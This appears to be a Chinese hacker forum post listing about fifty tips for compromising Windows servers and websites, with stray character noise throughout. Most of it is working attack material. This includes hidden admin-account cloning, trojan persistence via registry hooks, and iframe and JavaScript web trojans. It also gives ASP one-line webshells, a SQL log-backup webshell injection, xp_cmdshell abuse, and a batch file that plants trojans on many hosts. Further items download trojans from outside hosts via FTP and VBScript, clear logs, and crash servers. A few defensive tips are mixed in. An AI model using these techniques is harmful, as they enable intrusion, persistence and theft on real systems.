Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 T) x t$ t4 I' c2 q& [1 }
cacls C:\windows\system32 /G hqw20:R) ~ j6 o) j+ l
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 [5 H* ~& e1 n
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
# p/ q4 }, l0 L8 R/ O, ?. h# M6 _. P: L/ [* D
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。0 H: _& ]+ B3 x! B! r j
# q: S1 C# c9 Y* H9 R C0 k3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
+ r3 i0 c+ j4 O
! H& D8 Y3 h8 B w( @4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
/ f& T" P- _- v6 W) B _* e7 Q+ V/ f/ r$ r" w4 O/ d: [& v# c
5、利用INF文件来修改注册表
$ l& r9 X+ U$ d7 Q[Version]
, m, r! Y3 P! k% |# X% dSignature="$CHICAGO$"
, N& [" D) F* j7 m! t7 ]6 k6 R[Defaultinstall]5 ]5 X5 p' I7 Z5 }2 N6 A1 I
addREG=Ating7 x$ v! A$ p ]- e4 p# S4 D6 [
[Ating]
6 f# c, E' i/ _ B9 VHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"& R( @2 ?. p9 Q$ e" B
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:& h. M& G# a/ l5 I$ y
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径+ w/ F7 C; |& V+ |
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU+ {' p; ~9 U2 O: O) Y) q
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 L O1 M$ K4 l5 n2 P* o, ~# ~$ q
HKEY_CURRENT_CONFIG 简写为 HKCC r' Y" ^ K6 [
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值$ \+ d( t Y" ^; k% P
"1"这里代表是写入或删除注册表键值中的具体数据
; l9 T) Q2 N8 H. s. F u6 E. x: V" t w/ V7 z. F4 a% R# W
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,! k+ [. D& b7 `8 Z5 Y3 L7 k4 q
多了一步就是在防火墙里添加个端口,然后导出其键值
( ~& w* \# c! _. u( L( p( r[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# c, y- x4 l: [" _# h. B' `# W1 p) a8 T: U9 K' ^7 s3 O0 a
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
- n- S# c# T3 j/ C在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。/ E+ ~' {: g9 I- U$ U* |4 X8 w) }
( T& D9 q1 j3 y$ |
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
" s/ x) a) @+ K& S# s+ @% d4 F9 |1 u; G- n
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,% _ U* I ^+ s5 P9 X
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
4 L ~6 I1 h! L$ q# @+ X' h) I# }
4 L! I' B4 Z! q10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”! r u6 Q9 v' \% E1 M4 s( k
% z; Q# A. v: G
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 G* |6 z! N: W用法:xsniff –pass –hide –log pass.txt
& a2 }' u0 L: a* g7 u6 O$ j+ T+ s4 a& Q% i |9 c- w' B# P8 K( y
12、google搜索的艺术, N& z |* l5 m0 a/ Y# _6 T8 r
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 ^4 a% w0 e' n* [6 h. o: ~" M- c4 _或“字符串的语法错误”可以找到很多sql注入漏洞。2 s: k" Z E) [4 t
8 d) |* B, u) U" O4 ? a: q) o13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
8 ?7 w3 _) {% ]
; f! ^1 G, @3 |/ Y% Q) ?; ~) |2 J4 e6 P14、cmd中输入 nc –vv –l –p 1987
5 p3 t* ?! ]+ K; ~) x, t做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃$ B8 y, @& ~! i
: y4 n: ^3 {; o2 B. d& R
15、制作T++木马,先写个ating.hta文件,内容为5 P: H! L$ l: F0 S( h- T: r( ]
<script language="VBScript">3 e! I7 d0 H0 _& b: y9 f0 l
set wshshell=createobject ("wscript.shell" )
5 C1 w+ ]' T6 {+ ea=wshshell.run("你马的名称",1)# h5 H. E# I4 \5 L/ a
window.close9 Z$ `" U+ g7 P" J7 B
</script>
& x5 ~% T& E7 \7 f1 H再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
8 c1 c' T# U5 p m( C; d y$ G( O- T* E/ i/ V- g
16、搜索栏里输入( p$ W+ T6 d1 l3 ?1 _# J
关键字%'and 1=1 and '%'='
: H0 Y0 e4 n( T( a: N% z关键字%'and 1=2 and '%'='6 |8 S6 A! Z3 a+ p- R9 n
比较不同处 可以作为注入的特征字符9 P2 F9 L. z2 v4 ]9 U% e& |! }' L
0 W# Z- B1 s4 c9 s
17、挂马代码<html>
; i+ ]4 C& M/ S( o9 F) i. r<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! t5 i; M% Z% W) D: t</html>
+ G: ]2 l4 z8 h' A* I) u' R/ J7 y& Q# D/ e) c4 F$ v) c9 s/ u
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
. w- U$ [9 ^+ j- \! ~net localgroup administrators还是可以看出Guest是管理员来。
* C; [8 ~+ B# `' v# x
- w# ]2 Z# Q) U19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 g+ P. W3 k/ O. U: l0 s用法: 安装: instsrv.exe 服务名称 路径
, c( A' N( C9 K! Y) k4 k) V7 d% l卸载: instsrv.exe 服务名称 REMOVE9 @" b `" K7 ?8 o
* r, n1 r% O% h5 _' A+ m; q+ y8 a- M
) |0 _! V, I& Y( N
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉6 S# S$ t) j8 E1 |3 I. \
不能注入时要第一时间想到%5c暴库。
" b" \! }4 {! x8 z1 }" A/ p+ _% ~+ @' P
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~$ w$ ~: {3 f- F. z6 @
# q# G0 W& ]' T& F; J
23、缺少xp_cmdshell时
0 A$ h" q9 i1 X8 s5 l7 i- H尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'" m$ B6 d+ o* |" f% [% @
假如恢复不成功,可以尝试直接加用户(针对开3389的)
: b: v) j( C3 u+ f; B# Hdeclare @o int& m. Z# p) Y# _& F, g
exec sp_oacreate 'wscript.shell',@o out3 b5 \3 g2 B) ~, p; [
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) ]& H' ~) U1 o* _3 x; O
* s5 u7 Z3 e# D7 B1 w$ l24.批量种植木马.bat
" w+ r2 r) S7 O$ Mfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 R/ l2 v' v; H; d9 w
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
7 z+ Y) o2 X* {! z. d扫描地址.txt里每个主机名一行 用\\开头
4 ]) U' X# S8 q4 c- _" t: I
8 r) a$ V0 U+ E; u4 X) J0 z25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。/ i3 G: h; A U( T" ^
' m4 Z* N) ]3 |& h26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.. J; i# p0 k0 c/ r! g
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
$ I! ]5 Y& M/ e& `7 E0 b7 ].cer 等后缀的文件夹下都可以运行任何后缀的asp木马* y, O6 E) p# \# H; J
6 k5 a r2 R. U
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
7 i% `9 }9 ^8 j5 e K- G0 f2 d* X然后用#clear logg和#clear line vty *删除日志
4 m% C$ R. h% Y6 ~# a- o4 D4 A$ M. @2 O0 p( E7 h
28、电脑坏了省去重新安装系统的方法! ^0 [: @7 {0 ^: J- K* @
纯dos下执行,
2 _* S. `" ]. exp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" R& @+ ]' B! ~; M2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
/ B" ], D1 c$ ]. a, L4 D! H2 e; r$ d1 F+ W- i* Y
29、解决TCP/IP筛选 在注册表里有三处,分别是:! j! E) y# Y: ?' I
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip- r2 e, G6 `5 ]( F- R
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' v& X1 d' u7 I4 Q1 T1 e7 _" WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, F, J" |4 O9 D. F9 h0 ?分别用
( E; Q b$ j' G# n0 k' ^. jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: n* Y$ r* o; z: `9 n9 Q& v* J7 v: |
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ Z. x, Z3 e( ^6 W1 bregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ M2 D$ o. _+ O! Q, \6 {
命令来导出注册表项# S6 I! E# [$ ^& a$ [; q
然后把三个文件里的EnableSecurityFilters"=dword:00000001,+ C+ r/ r: W ?* @+ [ ?
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
g- L4 F+ E9 \# M# Aregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
8 \. V l# C, v l7 p' g1 ?2 G( y* z6 i5 T! j$ R" Y$ R. V' E
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U5 ^# X+ [ R- b O3 l4 I
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
3 b: p/ v1 R7 R. }! v# w% O! [& @8 s, ]0 u
31、全手工打造开3389工具
$ ~" y5 o% j& f y6 x, [6 R$ k( R' n打开记事本,编辑内容如下:+ k8 X! T: t5 R; X* @
echo [Components] > c:\sql
& T7 P+ p$ A1 a u+ x+ eecho TSEnable = on >> c:\sql
0 k& V* `3 {0 `" w# q- O4 ]sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
# m) n. p: h0 Z1 H4 W编辑好后存为BAT文件,上传至肉鸡,执行/ R$ O2 g5 P( B* z, C, x
4 z% _; X' F3 i {; J
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
7 `8 p* f' T( f0 h8 _
?6 i: C, N/ y. t) m/ u8 {33、让服务器重启
# k" c7 m! M' v写个bat死循环:
7 h: y/ N. J5 J9 d0 f4 A@echo off) Y4 U0 A1 b' r3 B: G; D
:loop13 p: u# a: @- a+ R# G
cls6 {1 _. i& }* x4 r) t! r
start cmd.exe, t$ ^6 Y; z- ^9 F5 S" U
goto loop1) [* ^/ \( U! J. ~( A
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
9 T' L! O% |- F! @, U5 ?
' F. [3 ~ f; P1 x34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; T8 W7 {. l8 |8 c
@echo off
9 H- |" C& k7 F, U9 wdate /t >c:/3389.txt% ^9 ~. S4 V1 L' f8 V+ e& c/ ~
time /t >>c:/3389.txt
. d8 q9 U& E/ R$ a5 u5 m0 |4 Oattrib +s +h c:/3389.bat; R) |& z; t3 L" K8 g% D9 D
attrib +s +h c:/3389.txt$ r$ U1 [* V$ l# K9 w' C
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt' e1 B8 K ]3 S1 ^) X$ j
并保存为3389.bat
, a: [0 B) z" L k8 x5 C- ]打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
2 j z9 L+ C- T1 c0 F- Q4 Q$ C8 Q: T7 g5 F4 w
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
& H" a; ?! n8 a/ }) ~6 ^. p! kstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)( Y# j; v; {0 ^& e
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。1 |9 r" e9 W: S- P
9 Z5 o7 ?$ B/ K+ X
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
" ~7 Q4 S: _* W% o5 Pecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址& k- {8 e z9 G& M- X
echo 你的FTP账号 >>c:\1.bat //输入账号
! t$ B. D# n. z0 S; u7 ~: decho 你的FTP密码 >>c:\1.bat //输入密码
: b6 ]9 T. b. ]% r( Becho bin >>c:\1.bat //登入
: C6 J+ E" _* u# A: Yecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
8 Q) G$ m3 N5 ~echo bye >>c:\1.bat //退出7 \, [% b2 w% v# @
然后执行ftp -s:c:\1.bat即可
. K7 d3 Z f0 U2 e' P7 H
2 Q( ?& g% H6 E( e37、修改注册表开3389两法
5 k# W( a$ V; X) W(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
/ z/ ^/ h$ {( X' Z! _, Y' Secho Windows Registry Editor Version 5.00 >>3389.reg0 |) W+ J b5 f$ l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
6 \' F+ R* J) o+ v9 x! M V- Lecho "Enabled"="0" >>3389.reg
8 {) V+ U) }1 t# T# g) o9 becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
3 t8 \5 K" l h: z" w) R% rNT\CurrentVersion\Winlogon] >>3389.reg/ u9 d {" A2 | t
echo "ShutdownWithoutLogon"="0" >>3389.reg
: v6 a! u$ E8 y1 j! g9 p! W ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
9 ]- v$ U. v- H% R>>3389.reg p# a6 |3 Q; Y/ y& x8 d% D/ o
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg) ]( m& h/ j" ^* x! R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
, |+ W4 l3 B( j; e, o ?. D>>3389.reg% H( ~+ b, ~; o* ^
echo "TSEnabled"=dword:00000001 >>3389.reg
& [8 n; T% F* b8 p1 v$ y" \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
" [; W; r2 i' X- `, iecho "Start"=dword:00000002 >>3389.reg
" o2 I! m0 {) N: y2 F. kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]3 l$ j) Y/ l0 _* G( s6 s
>>3389.reg% ~ d- P0 h3 @) e5 C& g; e' D
echo "Start"=dword:00000002 >>3389.reg
& s6 e9 L2 ]: `3 H* V F7 e% Becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ Q# w+ n, Y' L, x3 w( ~+ m
echo "Hotkey"="1" >>3389.reg
+ M, G+ Z5 y* becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 w$ v3 L9 p" G) W+ A7 qServer\Wds\rdpwd\Tds\tcp] >>3389.reg ^5 k! V; |$ X1 G" h& t
echo "PortNumber"=dword:00000D3D >>3389.reg& H% U$ C5 O# ?( S. X! c, v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' ^8 B: t: G9 u- UServer\WinStations\RDP-Tcp] >>3389.reg8 ^1 @: b! x, l+ q
echo "PortNumber"=dword:00000D3D >>3389.reg, h2 O% n1 w8 ~8 C4 B6 X! \
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 _/ G1 S" R- e, k5 k( {(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)9 d* c9 J+ D/ q" z! o4 l
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" ^. l: X% S2 X. x
(2)winxp和win2003终端开启
! W& s2 C* F' \& y1 v+ ^3 M8 }- g用以下ECHO代码写一个REG文件:
9 W. A( `8 Q% R: |* yecho Windows Registry Editor Version 5.00>>3389.reg
V1 S7 f, F" F4 t. q, L: Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* }) R3 I9 x& D K4 X; A
Server]>>3389.reg
# J: X% S- q# d a. `: {0 `4 Decho "fDenyTSConnections"=dword:00000000>>3389.reg% n6 ]! @9 V5 u! h* ~4 d( V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 A9 m b7 D0 z, b0 O& A- mServer\Wds\rdpwd\Tds\tcp]>>3389.reg0 @+ x ]9 N5 c, F1 x
echo "PortNumber"=dword:00000d3d>>3389.reg! d+ }2 C* E+ I7 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 m1 s/ n. P- u2 kServer\WinStations\RDP-Tcp]>>3389.reg
7 v7 {% H, T3 L" u; ~echo "PortNumber"=dword:00000d3d>>3389.reg
% c8 V* _6 f1 Z& p( c1 k然后regedit /s 3389.reg del 3389.reg
3 g" D0 C3 p1 {% }/ Y- IXP下不论开终端还是改终端端口都不需重启. h+ Z+ `) s3 c' }( ]
3 {8 h4 }5 C$ O. y6 {6 W/ \
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃) G0 V* B5 V% f# p' J+ C$ k
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
# D9 j$ {) Q+ y o
6 g. q- R G) n39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!, M+ ?$ w( `+ z
(1)数据库文件名应复杂并要有特殊字符
! O1 u: G. P& A7 g(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
& U/ T' \/ i) A% r4 M将conn.asp文档中的: u* C$ [0 p9 P) p3 S0 O) J" w: w
DBPath = Server.MapPath("数据库.mdb")
* V) A: n: J1 G5 Hconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath. l) {7 c2 C/ ~3 E: |
6 v, T* _# x( ]9 y修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
) C' ^9 a- C; P W9 ^$ m4 E(3)不放在WEB目录里
- F* C# J1 n) H1 K
/ z) x& S, y$ }% ~2 S8 I40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' s2 c1 H# V" X' {- [5 t+ ^可以写两个bat文件
- \/ D' E, J2 B) x1 q9 g@echo off1 w( S. D2 H* T: \; l2 @
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
; K J* R9 f' A: O' e+ J4 c@del c:\winnt\system32\query.exe8 I& p% m1 U, C! P& i! E
@del %SYSTEMROOT%\system32\dllcache\query.exe
, V6 z$ q3 _8 i5 M@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) T4 K+ r. |% c0 P# f3 Q v7 p$ a6 Z
' ^- O0 z+ F- t) o- N5 H9 S@echo off/ k0 p* ^+ U5 T+ |4 H
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 |" H2 A. y& M2 J& M1 K7 ?7 O0 `! @@del c:\winnt\system32\tsadmin.exe
6 P+ q8 }+ _* M F( s7 M1 n' v& N8 |@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
/ N$ C8 T# Q# T- o; F: n; C0 ]$ [/ y' M( ]" x5 c
41、映射对方盘符/ R/ U$ o4 F W/ y u
telnet到他的机器上," k/ l0 i4 G8 e L
net share 查看有没有默认共享 如果没有,那么就接着运行( y7 ]9 W% i {8 n) P$ C- P
net share c$=c:/ o+ V) i* M$ X) \% ]
net share现在有c$
1 w) N4 ~8 k, J6 Y2 C$ M* L在自己的机器上运行9 u5 N a) j+ _* V% l. }" H' `
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
2 D- J" `1 A3 h
0 O- c) h- V8 }7 |0 b( H T& a) Q42、一些很有用的老知识
* G% S$ S, d8 Y4 Wtype c:\boot.ini ( 查看系统版本 )4 N; G1 ]* \( {0 \* T
net start (查看已经启动的服务)$ x- ^- o% m# ?- ]* \' R
query user ( 查看当前终端连接 )
) [& `3 ^# G0 b) Tnet user ( 查看当前用户 )
1 X. b1 E& r; Hnet user 用户 密码/add ( 建立账号 )
$ p2 l* k& R8 N" v0 Y, rnet localgroup administrators 用户 /add (提升某用户为管理员)) Z- |+ N# ^ L
ipconfig -all ( 查看IP什么的 )
+ J* A7 u; [) X# o) l+ b6 {0 R. Snetstat -an ( 查看当前网络状态 )6 d6 b; R* I$ c3 {
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
$ _, `- ?# E# C, \' X克隆时Administrator对应1F41 P! t0 G: d2 L, Q* P2 M
guest对应1F54 h$ m) Q3 C9 H+ K2 N8 i9 p
tsinternetuser对应3E8
8 E% e! q! a4 r8 s. L6 o- W0 w( _ R- e: O; o. q
43、如果对方没开3389,但是装了Remote Administrator Service' g W9 Z; a5 D# z7 n" ~
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接& [/ B3 ]. U* `2 J$ h& l0 f
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息* l$ ~/ c& X4 @7 a0 r. }
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"1 t: p3 V3 [- i( A
9 ~# @# A) F8 ~2 y44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)4 x& n h& P6 K. N5 I/ l
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
. s+ q2 ~ S3 M2 e) ^
- `" h' v% Z5 z; C; Y- ~: e& R45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)9 A9 M; s# M+ U3 k; z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
8 X/ d0 @$ K p7 ^9 j$ b5 O( V^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =, g6 z" f1 D1 b/ ? R$ G
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- ^8 }' T5 {# A, f& I3 F0 |: A
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
7 A d! I/ [- U% Y# ?" @ z& c(这是完整的一句话,其中没有换行符)
- z) W4 C2 m5 i" l6 [, Y然后下载:
3 F4 x* o, G( H$ t. e) ]& Ncscript down.vbs http://www.hack520.org/hack.exe hack.exe
) i+ \. U6 ^8 ^5 @2 g& Y
6 D" X+ V; m) e4 k" h; s46、一句话木马成功依赖于两个条件: k5 |: S0 a% B# l
1、服务端没有禁止adodb.Stream或FSO组件% u4 [; H: g* u5 k; w
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。+ P8 K! ~7 t7 s+ e2 v( r
+ F* X- u- |9 _ Z6 N" Y47、利用DB_OWNER权限进行手工备份一句话木马的代码:
5 V5 f) R( Y l' P, E& ?3 g;alter database utsz set RECOVERY FULL--
1 c% e$ A3 e) A* E5 L;create table cmd (a image)--
, D; K. k& c+ |" v/ n2 |/ g;backup log utsz to disk = 'D:\cmd' with init--
! e! b9 F3 @+ S9 o* Q- t' R7 ~;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--- K# i- e* r8 X9 Q
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--8 w( `. {) Z' R: M" S# h
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
3 s* G y( v4 t9 a+ f0 m4 @* a" C- F- {
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
# t3 L8 R) O2 J; _3 t( K! c8 j) Z, B4 m6 g) H0 \& \# ~
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options& y9 u- ^- h, H3 Y$ M% H: r
所有会话用 'all'。
! s/ [" Z& O ?$ ?0 i-s sessionid 列出会话的信息。
" ~% k: Z" T; U, q9 M-k sessionid 终止会话。
" s* n9 n3 Z; Q+ A2 V-m sessionid 发送消息到会话。
2 [$ K* J0 ^( W; F/ Y* A
, y# Y9 J7 a' n. j7 ^+ zconfig 配置 telnet 服务器参数。& M# G& M- m8 J J8 O; X
3 U0 d8 i! p8 {+ L- { [6 Bcommon_options 为:
* }/ P& J7 \. X9 w0 m# c6 Q-u user 指定要使用其凭据的用户
5 c( k. H' v* P5 D/ s' }-p password 用户密码
- C" X* X/ L9 F0 s& Q) l5 }4 M# o$ H9 X; A4 O7 j, s( S
config_options 为:
6 U+ S4 I2 o( j) x7 W/ y, Kdom = domain 设定用户的默认域
9 O0 s5 H% x' l3 E2 Y2 Pctrlakeymap = yes|no 设定 ALT 键的映射
' q, D+ Z& }. Ptimeout = hh:mm:ss 设定空闲会话超时值
: L5 E4 f( p$ u1 {4 J$ ?timeoutactive = yes|no 启用空闲会话。1 M/ s5 ]# v, R5 O
maxfail = attempts 设定断开前失败的登录企图数。- V) y- x( m8 u$ W
maxconn = connections 设定最大连接数。+ q$ P0 j5 f o% _' `0 X
port = number 设定 telnet 端口。# F6 f. u8 x2 T+ ~
sec = [+/-]NTLM [+/-]passwd: t( @0 r; A# D) z U; M1 |
设定身份验证机构
- r* T e: n7 o6 q* l+ sfname = file 指定审计文件名。4 \; v. ?0 k" U, ]- d9 @
fsize = size 指定审计文件的最大尺寸(MB)。# i' O1 H. H3 E3 k
mode = console|stream 指定操作模式。2 ?7 {$ u- a, H( s
auditlocation = eventlog|file|both% `3 Q/ u! W, l) G
指定记录地点
) o1 U: I1 B$ }2 q- H* M5 W. u. {" {audit = [+/-]user [+/-]fail [+/-]admin
5 a% X, ~' y! }) S" q9 g [% a3 f, _% ?. i. a' v
49、例如:在IE上访问:6 C1 P" ], A3 r& E! r
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/- g6 B) J' c* A7 [
hack.txt里面的代码是:0 v( f( b- o0 D: J% q
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 F1 h) W1 K( _' W把这个hack.txt发到你空间就可以了!
# l$ o* T* S2 l这个可以利用来做网马哦!7 X1 l. J/ }. [
3 ~, f) A6 R4 Z6 H m, i7 W50、autorun的病毒可以通过手动限制!
/ v. R! q' M. a1 y9 J1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!% r5 `& A' h' O1 J+ S& s: z6 c. O0 c3 z
2,打开盘符用右键打开!切忌双击盘符~
$ W2 g4 ~2 j* t0 Q8 Y% m3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 E; ~- a5 ^" P* o
9 {% p. M( m! B4 L51、log备份时的一句话木马:
0 u9 i" _; S" ] J6 X8 H0 Za).<%%25Execute(request("go"))%%25>! `) t$ ^ P- _- \( h" W
b).<%Execute(request("go"))%>2 T$ }% p, Z% q( P, B
c).%><%execute request("go")%><%8 [0 u% k# f, \5 U/ ~
d).<script language=VBScript runat=server>execute request("sb")</Script>
" }8 a" S( k2 ~' p4 Ge).<%25Execute(request("l"))%25>
/ y' M" j: V( e" L0 q2 D6 a i& hf).<%if request("cmd")<>"" then execute request("pass")%>
' M1 m9 S' o% D% x1 ]# [; Y$ ]8 A1 ^% N" `( e' K
52、at "12:17" /interactive cmd- R0 g: ]6 |3 W) _
执行后可以用AT命令查看新加的任务
